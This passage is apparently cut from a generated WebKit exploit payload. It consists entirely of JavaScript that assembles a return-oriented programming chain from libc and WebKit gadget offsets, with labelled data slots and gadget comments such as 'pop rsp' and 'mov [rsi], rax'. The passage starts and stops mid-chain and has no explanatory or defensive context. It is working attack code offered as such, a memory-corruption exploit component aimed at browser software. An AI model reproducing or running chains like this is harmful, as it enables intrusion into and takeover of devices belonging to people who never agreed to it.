ropchain+477888, //L10319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10321:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+478080, //L10324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+478096, //L10325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+478048, //L10322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+478064, //L10323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10322:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10323:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10324:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10325:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+478192, //L10327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+478176, //L10326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10326:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10327:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10328:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10329:
db([6, 0]); // 0x6
set_gadget(libc_base+763368,); //pop rcx
//L10330:
db([6, 0]); // 0x6
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+478392, //L10332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10332:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+478448, //L10333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10333:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+478584, //L10337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+478568, //L10336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10335:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10337:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+478720, //L10340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+478752, //L10342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+478704, //L10339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10339:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10340:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10341:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10342:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+478864, //L10343+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+478856, //L10343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10343:
db([0, 0]); // 0x0
set_gadgets([
ropchain+478880, //L10343+24
ropchain+480208, //L10338
libc_base+764760, //pop rsi
ropchain+478920, //L10344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10344:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10346:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+479040, //L10349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+479024, //L10347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10347:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10349:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+479200, //L10353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+479152, //L10350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+479168, //L10351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10350:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10351:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10352:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10353:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+479256, //L10354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10354:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10356:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+479376, //L10357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+479392, //L10359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10357:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10359:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+479568, //L10362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+479584, //L10363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+479536, //L10360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+479552, //L10361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10360:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10361:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10362:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10363:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+479744, //L10367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+479712, //L10365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+479728, //L10366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10364:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10366:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+479816, //L10369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10368:
db([32, 0]); // 0x20
set_gadget(libc_base+759608,); //pop rax
//L10369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+479888, //L10371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10370:
db([56, 0]); // 0x38
set_gadget(libc_base+759608,); //pop rax
//L10371:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+480072, //L10374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+480088, //L10375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+480040, //L10372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+480056, //L10373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10372:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10373:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10374:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10375:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+480184, //L10378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+480168, //L10377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10378:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+483648, //L10376
//L10338:
libc_base+764760, //pop rsi
ropchain+480248, //L10379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10379:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10381:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+480368, //L10384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+480352, //L10382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10382:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+480544, //L10387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+480560, //L10388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+480512, //L10385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+480528, //L10386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10385:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10386:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10387:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10388:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+480656, //L10390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+480640, //L10389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10389:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10390:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10391:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10392:
db([7, 0]); // 0x7
set_gadget(libc_base+763368,); //pop rcx
//L10393:
db([7, 0]); // 0x7
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+480856, //L10395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10395:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+480912, //L10396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10396:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+481048, //L10400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+481032, //L10399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10398:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10400:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+481184, //L10403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+481216, //L10405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+481168, //L10402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10402:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10403:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10405:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+481328, //L10406+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+481320, //L10406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10406:
db([0, 0]); // 0x0
set_gadgets([
ropchain+481344, //L10406+24
ropchain+482672, //L10401
libc_base+764760, //pop rsi
ropchain+481384, //L10407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10407:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10409:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+481504, //L10412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+481488, //L10410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10410:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10412:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+481664, //L10416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+481616, //L10413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+481632, //L10414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10413:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10415:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10416:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+481720, //L10417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10417:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10419:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+481840, //L10420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+481856, //L10422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10420:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10422:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+482032, //L10425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+482048, //L10426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+482000, //L10423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+482016, //L10424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10423:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10424:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10425:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10426:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+482208, //L10430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+482176, //L10428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+482192, //L10429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10427:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10428:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10429:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10430:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+482280, //L10432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10431:
db([32, 0]); // 0x20
set_gadget(libc_base+759608,); //pop rax
//L10432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+482352, //L10434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10433:
db([48, 0]); // 0x30
set_gadget(libc_base+759608,); //pop rax
//L10434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+482536, //L10437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+482552, //L10438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+482504, //L10435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+482520, //L10436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10435:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10436:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10438:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+482648, //L10441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+482632, //L10440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10440:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10441:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+483648, //L10439
//L10401:
libc_base+764760, //pop rsi
ropchain+482712, //L10442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10442:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10444:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+482832, //L10447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+482816, //L10445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10445:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10447:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+482992, //L10451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+482944, //L10448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+482960, //L10449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10448:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10449:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10450:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10451:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+483048, //L10452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10452:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10454:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+483168, //L10455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+483184, //L10457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10455:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10457:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+483360, //L10460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+483376, //L10461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+483328, //L10458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+483344, //L10459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10458:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10459:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10460:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10461:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+483536, //L10465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+483504, //L10463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+483520, //L10464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10462:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10463:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10464:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10465:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+483640, //L10467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+483624, //L10466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10466:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10467:
db([0, 0]); // 0x0
//L10439:
//L10376:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+483688, //L10468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10468:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10470:
db([4294967224, 4294967295]); // -0x48
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L10472:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+483848, //L10475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+483832, //L10473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10473:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10475:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+484024, //L10478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
